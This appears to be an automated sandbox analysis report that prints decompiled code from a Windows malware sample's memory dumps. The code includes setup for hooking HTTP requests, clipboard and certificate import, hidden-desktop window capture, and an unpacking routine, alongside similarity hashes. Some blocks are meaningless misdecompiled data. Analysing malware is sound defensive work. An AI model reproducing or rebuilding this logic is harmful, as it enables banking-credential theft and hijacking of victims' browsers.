    				return (0x423290[_t23] ^ 0x423290[_t23] >> 0x0000000b ^ ((0x423290[_t23] ^ 0x423290[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x423290[_t23] ^ 0x423290[_t23] >> 0x0000000b ^ ((0x423290[_t23] ^ 0x423290[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x423290[_t23] ^ 0x423290[_t23] >> 0x0000000b ^ ((0x423290[_t23] ^ 0x423290[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x423290[_t23] ^ 0x423290[_t23] >> 0x0000000b ^ ((0x423290[_t23] ^ 0x423290[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
    			}

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID: L<B
    • API String ID: 0-1843459317
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E004021EB(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi, void* __fp0) {
    				intOrPtr* _t95;
    				void* _t96;
    				void* _t98;
    				intOrPtr* _t100;
    				void* _t102;
    				intOrPtr* _t104;
    				signed char _t111;
    				signed char _t112;
    				signed char _t113;
    				signed char _t114;
    				signed char _t127;
    				signed char _t128;
    				signed char _t132;
    				signed char _t133;
    				void* _t165;
    				void* _t168;
    				intOrPtr* _t169;
    				void* _t170;
    				void* _t171;
    				intOrPtr* _t172;
    				intOrPtr* _t187;
    				intOrPtr* _t188;
    				void* _t189;
    				intOrPtr* _t191;
    				signed char _t195;
    				intOrPtr* _t205;
    				signed char _t213;
    				signed char _t217;
    				intOrPtr* _t224;
    				intOrPtr* _t225;
    				void* _t226;
    				intOrPtr* _t229;
    				void* _t230;
    				intOrPtr* _t232;
    				intOrPtr* _t233;
    				void* _t236;
    				intOrPtr* _t237;
    				void* _t239;
    				void* _t241;
    				void* _t242;
    				void* _t243;
    				void* _t245;
    				void* _t246;
    				void* _t249;
    				void* _t251;
    				void* _t252;
    				void* _t253;
    				void* _t254;
    
    				_t232 = __esi;
    				_t168 = __ebx;
    				_t205 = __edx + __ecx;
    				 *__eax =  *__eax + __ebx;
    				_t253 = _t252 + __ecx;
    				 *_t205 =  *_t205 + __ebx;
    				 *__esi =  *__esi + __ecx;
    				_t95 = __eax + _t205;
    				 *_t95 =  *_t95 + _t205;
    				 *((intOrPtr*)(__ebx + 1)) =  *((intOrPtr*)(__ebx + 1)) + _t95;
    				asm("rol byte [ecx], cl");
    				_t224 = __edi + __ecx + 1;
    				_t242 = _t241 + _t205;
    				 *((intOrPtr*)(_t95 + 1)) =  *((intOrPtr*)(_t95 + 1)) + _t205;
    				_pop(_t96);
    				_t187 = __ecx + _t205 + __ebx;
    				_t5 = __esi + 1;
    				 *_t5 =  *((intOrPtr*)(__esi + 1)) + _t242;
    				asm("fild dword [ecx]");
    				if( *_t5 >= 0) {
    					asm("fiadd word [ecx]");
    				}
    				 *((intOrPtr*)(_t205 + 1)) =  *((intOrPtr*)(_t205 + 1)) + _t253;
    				asm("loopne 0x3");
    				_push(_t242);
    				_t169 = _t168 + _t253;
    				 *_t169 =  *_t169 + _t96;
    				_t243 = _t242 + _t253;
    				 *_t205 =  *_t205 + _t224;
    				_t233 = _t232 + _t253;
    				 *_t224 =  *_t224 + _t96;
    				 *0x1901ea01 =  *0x1901ea01 + _t187;
    				_t254 = _t253 + _t243;
    				 *_t169 =  *_t169 + _t169;
    				_t225 = _t224 + _t243;
    				 *_t225 =  *_t225 + _t187;
    				_t98 = _t96 + _t243 + _t233;
    				 *_t187 =  *_t187 + _t205;
    				_t188 = _t187 + _t233;
    				 *((intOrPtr*)(_t188 + _t98 - 0xe)) =  *((intOrPtr*)(_t188 + _t98 - 0xe)) + _t98;
    				 *((intOrPtr*)(_t98 + 1)) =  *((intOrPtr*)(_t98 + 1)) + _t188;
    				asm("cmc");
    				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t205;
    				asm("clc");
    				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t169;
    				asm("stc");
    				 *((intOrPtr*)(_t225 + 1)) =  *((intOrPtr*)(_t225 + 1)) + _t243;
    				asm("sti");
    				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t233;
    				 *_t188 =  *_t188 + 1;
    				asm("arpl [ecx], ax");
    				 *_t188 =  *_t188 + 1;
    				_t100 =  *0xa6012602 +  *((intOrPtr*)(_t188 +  *0xa6012602));
    				_t170 = _t169 +  *_t233;
    				 *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) =  *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) + _t243;
    				asm("daa");
    				 *((intOrPtr*)(_t233 - 0x46fedafe)) =  *((intOrPtr*)(_t233 - 0x46fedafe)) + _t233;
    				 *((intOrPtr*)(_t170 - 0x43fee0fe)) =  *((intOrPtr*)(_t170 - 0x43fee0fe)) + _t225;
    				_t189 = _t188 +  *_t100;
    				_t102 = _t100 +  *_t100 + _t170;
    				_t171 = _t170 +  *((intOrPtr*)(_t189 + _t102));
    				asm("insb");
    				_t172 = _t171 +  *((intOrPtr*)(_t189 + _t102 - 0x1b));
    				_t236 = _t233 + _t100 + _t171 + _t254;
    				_t191 = _t189 +  *_t172 +  *((intOrPtr*)(_t189 +  *_t172));
    				_t245 = _t243 + _t205 +  *_t188 +  *0xa02c501 + _t236;
    				_t104 = _t102 +  *_t191 + _t225;
    				_t237 = _t236 + _t225;
    				 *0xa3013803 = _t104;
    				asm("movsd");
    				_t246 = _t245 +  *_t104;
    				 *((intOrPtr*)(_t237 - 0x55fec4fd)) =  *((intOrPtr*)(_t237 - 0x55fec4fd)) + _t254;
    				 *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) =  *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) + _t246;
    				_push(_t225);
    				 *((intOrPtr*)(_t246 - 0x49fed6fd)) =  *((intOrPtr*)(_t246 - 0x49fed6fd)) + _t237;
    				_t226 = _t225 +  *((intOrPtr*)(_t191 + _t104));
    				 *((intOrPtr*)(3 + _t104 + 0x3bd0167)) =  *((intOrPtr*)(3 + _t104 + 0x3bd0167)) + _t226;
    				 *((intOrPtr*)(_t226 - 0x3ffeb4fd)) =  *((intOrPtr*)(_t226 - 0x3ffeb4fd)) + _t226;
    				asm("rol byte [ebx], cl");
    				_t239 = _t237 +  *_t237 +  *0xFFFFFFFFBB011304;
    				_push(0x6a03de01);
    				_t229 = _t226 + _t104 +  *_t104 + _t191 + _t254 +  *((intOrPtr*)(_t237 + 1)) +  *3 + _t191 - 1;
    				_t249 = _t246 +  *_t237 +  *0xbb011303 +  *_t229;
    				_t213 = 0xffffffffbb011302 +  *_t237 +  *_t229;
    				_t230 = _t229 + _t249;
    				asm("repne add ecx, [ebp+0x1]");
    				asm("repe add esi, [edi]");
    				_t195 = _t191 + 0xffffffff76022609 + _t239 + _t230;
    				asm("std");
    				_t251 = _t249 +  *((intOrPtr*)(0xffffffffbb011306)) +  *((intOrPtr*)(_t195 + 1));
    				 *((char*)(0xffffffffbb011306)) =  *((char*)(0xffffffffbb011306)) + 1;
    				_t111 = 0x3e +  *_t195 * 0x7e;
    				 *(_t195 - 0x5dcffdfc) =  *(_t195 - 0x5dcffdfc) & _t111;
    				_t112 = _t111 + 0xc;
    				 *0xFFFFFFFF5F31200A =  *0xFFFFFFFF5F31200A ^ _t112;
    				_t113 = _t112 + 1;
    				 *(_t251 - 0x59cf04fc) =  *(_t251 - 0x59cf04fc) ^ _t113;
    				_t114 = _t113 + 0xf2;
    				 *(_t230 - 0x57cf5efc) =  *(_t230 - 0x57cf5efc) ^ _t114;
    				 *(_t195 - 0x55cf5afc) =  *(_t195 - 0x55cf5afc) ^ _t195;
    				 *0xFFFFFFFF6731BC0A =  *0xFFFFFFFF6731BC0A ^ _t195;
    				 *(_t251 - 0x51cf1afc) =  *(_t251 - 0x51cf1afc) ^ _t195;
    				 *(_t230 - 0x4fcf3cfc) =  *(_t230 - 0x4fcf3cfc) ^ _t195;
    				 *(_t195 - 0x4dcf5dfc) =  *(_t195 - 0x4dcf5dfc) ^ _t213;
    				 *0xFFFFFFFF6F31B90A =  *0xFFFFFFFF6F31B90A ^ _t213;
    				 *(_t251 - 0x49cf55fc) =  *(_t251 - 0x49cf55fc) ^ _t213;
    				 *(_t230 - 0x47cf52fc) =  *(_t230 - 0x47cf52fc) ^ _t213;
    				 *(_t195 - 0x45cf4efc) =  *(_t195 - 0x45cf4efc) ^ 0xffffffffbb011306;
    				 *0xFFFFFFFF7731C80A =  *0xFFFFFFFF7731C80A ^ 0xffffffffbb011306;
    				 *(_t251 - 0x41cf46fc) =  *(_t251 - 0x41cf46fc) ^ 0xffffffffbb011306;
    				 *(_t230 - 0x3fcf42fc) =  *(_t230 - 0x3fcf42fc) ^ 0xffffffffbb011306;
    				_t127 = _t114 + 0x99a;
    				_t128 = _t127 + 0xc1;
    				_t132 = (_t128 + 0x18a ^ _t128 + 0x18a) + 0xc8;
    				_t133 = _t132 + 0xca;
    				_t217 = _t213 ^ _t128 ^ _t133 ^ 0;
    				_t165 = ((((((_t133 + 0x197 ^ _t195 ^ _t127 ^ _t132) + 0x33c ^ 0) + 0x366 ^ _t217) + 0x382 ^ 0) + 0x39b ^ 0x00000003) + 0x3ae ^ 0) + 0x319;
    				 *(_t251 + _t165 + 0x5bb060c) =  *(_t251 + _t165 + 0x5bb060c) ^ 0 ^ _t217 ^ 3;
    				asm("sbb eax, [esi]");
    				return _t165 + 0x05c20621 &  *(_t239 +  *0xFFFFFFFFBB011307);
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
    • Instruction ID: ba034fe0260e76fb634bcbf44d86e0ca35d2e6c216dacbbe8ba02d624f1461b9
    • Opcode Fuzzy Hash: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
    • Instruction Fuzzy Hash: 9881C4319893918BCB95DF38C8D56D6BBB1EE4322432E85DDC8940EA03E22F651BDF51
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E00414714(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
    				signed int _v8;
    				signed int _v12;
    				intOrPtr* _v16;
    				signed int _v20;
    				unsigned int _t67;
    				signed int _t68;
    				intOrPtr _t71;
    				void* _t79;
    				signed int _t81;
    				intOrPtr _t87;
    				intOrPtr _t88;
    				signed int _t98;
    				signed int _t99;
    				signed int _t100;
    				signed int _t101;
    				signed int _t102;
    				unsigned int _t103;
    				signed int _t104;
    				signed int _t106;
    				signed int _t108;
    				signed int _t111;
    				signed int _t115;
    				signed int _t116;
    				intOrPtr* _t119;
    				unsigned int _t125;
    				signed int _t126;
    				signed int _t128;
    
    				_t71 = _a4;
    				_t98 = 0;
    				_t99 = 0;
    				_v16 = 0;
    				_v20 = 1;
    				L1:
    				while(1) {
    					if(_t99 == 0) {
    						_t103 =  *(_t98 + _t71);
    						_t98 = _t98 + 4;
    						_t99 = 0x1f;
    						_t104 = _t103 >> 0x1f;
    					} else {
    						_t99 = _t99 - 1;
    						_t104 = _t67 >> _t99 & 0x00000001;
    					}
    					if(_t104 != 0) {
    						_v16 = _v16 + 1;
    						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
    						_t98 = _t98 + 1;
    						L6:
    						_t71 = _a4;
    						continue;
    					}
    					_v12 = 1;
    					do {
    						if(_t99 == 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t100 = 0x1f;
    							_t106 = _t67 >> 0x1f;
    						} else {
    							_t100 = _t99 - 1;
    							_t106 = _t67 >> _t100 & 0x00000001;
    						}
    						_v12 = _t106 + _v12 * 2;
    						if(_t100 == 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t99 = 0x1f;
    							_t108 = _t67 >> 0x1f;
    						} else {
    							_t99 = _t100 - 1;
    							_t108 = _t67 >> _t99 & 0x00000001;
    						}
    					} while (_t108 == 0);
    					_t111 = _v12;
    					if(_t111 == 2) {
    						_t81 = _v20;
    						L19:
    						_v12 = _t81;
    						if(_t99 == 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t101 = 0x1f;
    							_v8 = _t67 >> 0x1f;
    						} else {
    							_t101 = _t99 - 1;
    							_v8 = _t67 >> _t101 & 0x00000001;
    						}
    						if(_t101 == 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t99 = 0x1f;
    							_t115 = _t67 >> 0x1f;
    						} else {
    							_t99 = _t101 - 1;
    							_t115 = _t67 >> _t99 & 0x00000001;
    						}
    						_t116 = _t115 + _v8 * 2;
    						_v8 = _t116;
    						if(_t116 == 0) {
    							_v8 = 1;
    							do {
    								if(_t99 == 0) {
    									_t125 =  *(_t98 + _t71);
    									_t98 = _t98 + 4;
    									_t102 = 0x1f;
    									_t126 = _t125 >> 0x1f;
    								} else {
    									_t102 = _t99 - 1;
    									_t126 = _t67 >> _t102 & 0x00000001;
    								}
    								_v8 = _t126 + _v8 * 2;
    								if(_t102 == 0) {
    									_t67 =  *(_t98 + _t71);
    									_t98 = _t98 + 4;
    									_t99 = 0x1f;
    									_t128 = _t67 >> 0x1f;
    								} else {
    									_t99 = _t102 - 1;
    									_t128 = _t67 >> _t99 & 0x00000001;
    								}
    							} while (_t128 == 0);
    							_v8 = _v8 + 2;
    						}
    						asm("sbb ecx, ecx");
    						_v8 = _v8 +  ~0xd00;
    						_t87 = _v16;
    						_t119 = _t87 - _v12 + _a12;
    						_v16 = _t119;
    						 *((char*)(_t87 + _a12)) =  *_t119;
    						_t88 = _t87 + 1;
    						_v16 = _v16 + 1;
    						do {
    							 *((char*)(_t88 + _a12)) =  *_v16;
    							_t88 = _t88 + 1;
    							_v16 = _v16 + 1;
    							_t57 =  &_v8;
    							 *_t57 = _v8 - 1;
    						} while ( *_t57 != 0);
    						_v16 = _t88;
    						goto L6;
    					}
    					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
    					_t98 = _t98 + 1;
    					if(_t79 != 0xffffffff) {
    						_t81 = _t79 + 1;
    						_v20 = _t81;
    						goto L19;
    					}
    					_t68 = _a16;
    					 *_t68 = _v16;
    					return _t68 & 0xffffff00 | _t98 == _a8;
    				}
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 4f4b364eb5e01cb4963202215bd9b16e8fc03a0e04bf887195a9ff215a63561e
    • Instruction ID: ce87c902909f0050b0a66e94c6c2cd8e60c2d74f0c551077053abc404cf98c6b
    • Opcode Fuzzy Hash: 4f4b364eb5e01cb4963202215bd9b16e8fc03a0e04bf887195a9ff215a63561e
    • Instruction Fuzzy Hash: 8651BF36E00A259BDB14CE58C4502EDF7B1AFC6724F1A42AACD16BF385D774AD81CB84
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 66%
    			E00419823() {
    				void* __ebx;
    				intOrPtr _t1;
    				signed int _t55;
    				void* _t57;
    				void* _t58;
    
    				_t1 =  *0x422554;
    				if(_t1 == 0) {
    					_t1 =  *0x422550;
    					 *0x42200c = E00408D01;
    				} else {
    					 *0x42200c = E00408DB8;
    				}
    				 *0x422008 = _t1;
    				 *0x422018 =  *0x422560;
    				 *0x422028 = GetFileAttributesExW;
    				 *0x422038 = HttpSendRequestW;
    				 *0x422048 = HttpSendRequestA;
    				 *0x422058 = HttpSendRequestExW;
    				 *0x422068 = HttpSendRequestExA;
    				 *0x422078 = InternetCloseHandle;
    				 *0x422088 = InternetReadFile;
    				 *0x422098 = __imp__InternetReadFileExA;
    				 *0x4220a8 = InternetQueryDataAvailable;
    				 *0x4220b8 = HttpQueryInfoA;
    				 *0x4220c8 = __imp__#3;
    				 *0x4220d8 = __imp__#19;
    				 *0x4220e8 = __imp__WSASend;
    				 *0x4220f8 = OpenInputDesktop;
    				 *0x422108 = SwitchDesktop;
    				 *0x422118 = DefWindowProcW;
    				 *0x422128 = DefWindowProcA;
    				 *0x422138 = DefDlgProcW;
    				 *0x422148 = DefDlgProcA;
    				 *0x422158 = DefFrameProcW;
    				 *0x422168 = DefFrameProcA;
    				 *0x422178 = DefMDIChildProcW;
    				 *0x422188 = DefMDIChildProcA;
    				 *0x422198 = CallWindowProcW;
    				 *0x4221a8 = CallWindowProcA;
    				 *0x4221b8 = RegisterClassW;
    				 *0x4221c8 = RegisterClassA;
    				 *0x4221d8 = RegisterClassExW;
    				 *0x4221e8 = RegisterClassExA;
    				 *0x4221f8 = BeginPaint;
    				 *0x422208 = EndPaint;
    				 *0x422218 = GetDCEx;
    				 *0x422228 = GetDC;
    				 *0x422238 = GetWindowDC;
    				 *0x422248 = ReleaseDC;
    				 *0x422258 = GetUpdateRect;
    				 *0x422268 = GetUpdateRgn;
    				 *0x422278 = GetMessagePos;
    				 *0x422288 = GetCursorPos;
    				 *0x422298 = SetCursorPos;
    				 *0x4222a8 = SetCapture;
    				 *0x4222b8 = ReleaseCapture;
    				 *0x4222c8 = GetCapture;
    				 *0x4222d8 = GetMessageW;
    				 *0x4222e8 = GetMessageA;
    				 *0x4222f8 = PeekMessageW;
    				 *0x422308 = PeekMessageA;
    				 *0x422318 = TranslateMessage;
    				_push(0x422008);
    				 *0x422328 = GetClipboardData;
    				_t55 = 0x34;
    				 *0x422338 = __imp__PFXImportCertStore;
    				return E00419792(_t55, _t57, _t58);
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: e2b2a2918b4699f7cc8d2f25a9871d657e74ed4998cf913d8686065b1bbbe110
    • Instruction ID: 7fd0c0d413c19c5967cfa16bf51bc9a843055eb620c497a5d0c3c2b7666fa073
    • Opcode Fuzzy Hash: e2b2a2918b4699f7cc8d2f25a9871d657e74ed4998cf913d8686065b1bbbe110
    • Instruction Fuzzy Hash: D661BEB8A00241EFD3A0CF28EFC0A5077E4B3487543E1417AE918E7731E2B5A996DB1D
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
    • Instruction ID: 8e28d7f3623ebb4924d1157d0fefa6ab95efcb31daae6b8189b4157b9968a788
    • Opcode Fuzzy Hash: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
    • Instruction Fuzzy Hash: 65E0DF7A3005148BCB41CA15D480943B7B2FBC8330B2286B5C8198B346D938FDC38AE5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E0040BC64(RECT* __eax, void* __ecx, signed int __edx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, signed int _a15) {
    				char _v9;
    				signed int _v10;
    				int _v16;
    				int _v20;
    				int _v24;
    				int _v28;
    				int _v32;
    				struct tagRECT _v48;
    				struct tagRECT _v64;
    				void* _v68;
    				signed int _v72;
    				int _v76;
    				intOrPtr _v80;
    				intOrPtr _v84;
    				int _v88;
    				int _v92;
    				struct HDC__* _v96;
    				struct HWND__* _v100;
    				void _v104;
    				intOrPtr _v140;
    				intOrPtr _v156;
    				struct tagWINDOWINFO _v164;
    				signed int _t128;
    				signed int _t135;
    				void* _t140;
    				void* _t146;
    				signed int _t164;
    				intOrPtr _t191;
    				long _t192;
    				intOrPtr _t195;
    				long _t196;
    				long _t210;
    				long _t211;
    				long _t212;
    				long _t213;
    				signed int _t214;
    				signed int _t215;
    				RECT* _t216;
    				struct HDC__* _t217;
    				struct HDC__* _t221;
    
    				_t214 = __edx;
    				_t216 = __eax;
    				_t128 = E0041A6EF(_a8) & 0x0000ffff;
    				_v16 = _t128;
    				if((_t128 & 0x00000001) == 0) {
    					if(_t128 == 0) {
    						_v16 = 2;
    						_t128 = _v16;
    					}
    					if(_a12 != 0 && (_t128 & 0x00000002) != 0) {
    						_v16 = _t128 & 0x0000fffd | 0x00000008;
    					}
    					_v24 = 0;
    					_v20 = 0;
    					_v28 = 0;
    					_v32 = 0;
    					_v164.cbSize = 0x3c;
    					if(GetWindowInfo(_a8,  &_v164) != 0) {
    						_t215 = _t214 & 0xffffff00 | IntersectRect( &_v64,  &(_v164.rcWindow), _t216) != 0x00000000;
    						_v10 = _t215;
    						if(_t215 != 0) {
    							_t212 = _t216->top;
    							_t195 = _v156;
    							if(_t195 < _t212) {
    								_v20 = _t195 - _t212;
    							}
    							_t213 = _t216->left;
    							_t196 = _v164.rcWindow.left;
    							if(_t196 < _t213) {
    								_v24 = _t196 - _t213;
    							}
    						}
    						_t135 = _v16 & 0x00000002;
    						_v72 = _t135;
    						if(_t135 == 0) {
    							_a15 = _t215;
    						} else {
    							if((_v164.dwStyle & 0x20000000) == 0) {
    								_a15 = IntersectRect( &_v48,  &(_v164.rcClient), _t216) != 0;
    								if(_a15 != 0) {
    									_t210 = _t216->top;
    									_t191 = _v140;
    									if(_t191 < _t210) {
    										_v32 = _t191 - _t210;
    									}
    									_t211 = _t216->left;
    									_t192 = _v164.rcClient.left;
    									if(_t192 < _t211) {
    										_v28 = _t192 - _t211;
    									}
    								}
    							} else {
    								_a15 = 0;
    							}
    						}
    						if(_v10 != 0 || _a15 != 0) {
    							_t217 = GetDC(0);
    							if(_t217 == 0) {
    								goto L8;
    							}
    							_t221 = CreateCompatibleDC(_t217);
    							ReleaseDC(0, _t217);
    							if(_t221 == 0) {
    								goto L8;
    							}
    							_t218 = _a4;
    							_t140 = SelectObject(_t221,  *(_a4 + 0x1c));
    							_v68 = _t140;
    							if(_t140 != 0) {
    								_v9 = 1;
    								if(_v72 == 0) {
    									if((_v16 & 0x00000004) == 0) {
    										if((_v16 & 0x00000008) == 0) {
    											L56:
    											SelectObject(_t221, _v68);
    											DeleteDC(_t221);
    											return _v9;
    										}
    										if(_v24 != 0 || _v20 != 0) {
    											SetViewportOrgEx(_t221, _v24, _v20, 0);
    										}
    										_t146 = E0040BB82(_t218,  &_v64, 0);
    										__imp__PrintWindow(_a8, _t221, 0);
    										if(_t146 != 0) {
    											L55:
    											E0040BB82(_t218,  &_v64, 1);
    										} else {
    											_v9 = 0;
    										}
    										goto L56;
    									}
    									if(_v24 != 0 || _v20 != 0) {
    										SetViewportOrgEx(_t221, _v24, _v20, 0);
    									}
    									E0040BB82(_t218,  &_v64, 0);
    									DefWindowProcW(_a8, 0x317, _t221, 0xe);
    									goto L55;
    								}
    								_v100 = _a8;
    								_v96 = _t221;
    								_v84 = _v48.right - _v48.left;
    								_v76 = 1;
    								_v80 = _v48.bottom - _v48.top;
    								_v92 = 0;
    								_v88 = 0;
    								TlsSetValue( *0x423e7c,  &_v104);
    								if(_v10 == 1 && EqualRect( &_v48,  &_v64) == 0) {
    									_v16 = SaveDC(_t221);
    									if(_v24 != 0 || _v20 != 0) {
    										SetViewportOrgEx(_t221, _v24, _v20, 0);
    									}
    									E0040BB82(_a4,  &_v64, 0);
    									_v104 = 0;
    									SendMessageW(_a8, 0x85, 1, 0);
    									if(_v104 == 0) {
    										DefWindowProcW(_a8, 0x317, _t221, 2);
    									}
    									E0040BB82(_a4,  &_v64, 1);
    									RestoreDC(_t221, _v16);
    								}
    								if(_a15 != 1) {
    									L49:
    									TlsSetValue( *0x423e7c, 0);
    									goto L56;
    								} else {
    									if(_v28 != 0) {
    										L41:
    										_a15 = 1;
    										L42:
    										_v16 = SaveDC(_t221);
    										if(_a15 != 0) {
    											SetViewportOrgEx(_t221, _v28, _v32, 0);
    										}
    										E0040BB82(_a4,  &_v48, 0);
    										_t164 = SendMessageW(_a8, 0x14, _t221, 0);
    										asm("sbb eax, eax");
    										_v76 =  ~_t164 + 1;
    										RestoreDC(_t221, _v16);
    										if(_a15 != 0) {
    											SetViewportOrgEx(_t221, _v28, _v32, 0);
    										}
    										_v104 = 0;
    										SendMessageW(_a8, 0xf, 0, 0);
    										if(_v104 == 0) {
    											DefWindowProcW(_a8, 0x317, _t221, 4);
    										}
    										E0040BB82(_a4,  &_v48, 1);
    										goto L49;
    									}
    									_a15 = 0;
    									if(_v32 == 0) {
    										goto L42;
    									}
    									goto L41;
    								}
    							}
    							DeleteDC(_t221);
    							goto L8;
    						} else {
    							goto L1;
    						}
    					}
    					L8:
    					return 0;
    				}
    				L1:
    				return 1;
    			}

    APIs
      • Part of subcall function 0041A6EF: GetClassNameW.USER32 ref: 0041A70A
    • GetWindowInfo.USER32 ref: 0040BCD0
    • SelectObject.GDI32(00000000,?), ref: 0040BF9F
    • DeleteDC.GDI32(00000000), ref: 0040BFA6
    • SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0040BFCE
    • PrintWindow.USER32(00000008,00000000,00000000,00000000), ref: 0040BFE4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Window$ClassDeleteInfoNameObjectPrintSelectViewport
    • String ID: <
    • API String ID: 3458064076-4251816714
    • Opcode ID: 9dfeda1e90e3a9bfebfb0f040100ceacd9235d489d95e69d768255c43ed8b11c
    • Instruction ID: fab35b14d7857cc2a86b72428ebe6a2bff67851e703e3f381308b44792ff810a
    • Opcode Fuzzy Hash: 9dfeda1e90e3a9bfebfb0f040100ceacd9235d489d95e69d768255c43ed8b11c
    • Instruction Fuzzy Hash: B6C15C71900249AFDF119FA4DD84EEEBBB9EF04300F04806AF955B72A0D7388A45DF99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041A756(void* __ecx, void* __edx, void** __esi, struct HDC__* _a4) {
    				char _v9;
    				struct HDC__* _v16;
    				char _v20;
    				short _v128;
    				void* _v138;
    				char _v616;
    				char _v1126;
    				char _v1576;
    				void* _t60;
    				long _t62;
    				void* _t66;
    				void* _t71;
    				void* _t75;
    				void* _t79;
    				void* _t80;
    				struct HDC__* _t82;
    				int _t85;
    				void* _t87;
    				signed char _t90;
    				void* _t92;
    				void* _t107;
    				struct HDC__* _t108;
    				void* _t109;
    				void* _t111;
    				void* _t112;
    				void* _t120;
    				void** _t124;
    
    				_t124 = __esi;
    				_t120 = __edx;
    				E00411A74(_t60, __esi, 0, 0x18c);
    				_t62 = TlsAlloc();
    				__esi[1] = _t62;
    				if(_t62 != 0xffffffff) {
    					E00406312(0x84889911,  &_v128, 0);
    					_t66 = RegisterWindowMessageW( &_v128);
    					__esi[2] = _t66;
    					__eflags = _t66;
    					if(_t66 == 0) {
    						goto L1;
    					}
    					E00406312(0x84889912,  &_v128, 1);
    					_t71 = CreateEventW(0x422568, 1, 0,  &_v128);
    					__esi[3] = _t71;
    					__eflags = _t71;
    					if(_t71 == 0) {
    						goto L1;
    					}
    					E00406312(0x18782822,  &_v128, 1);
    					_t75 = CreateMutexW(0x422568, 0,  &_v128);
    					__esi[5] = _t75;
    					__eflags = _t75;
    					if(_t75 == 0) {
    						goto L1;
    					}
    					E00406312(0x9878a222,  &_v128, 1);
    					_t79 = CreateFileMappingW(0, 0x422568, 4, 0, 0x3d09128,  &_v128);
    					 *__esi = _t79;
    					__eflags = _t79;
    					if(_t79 == 0) {
    						goto L1;
    					}
    					_t80 = MapViewOfFile(_t79, 2, 0, 0, 0);
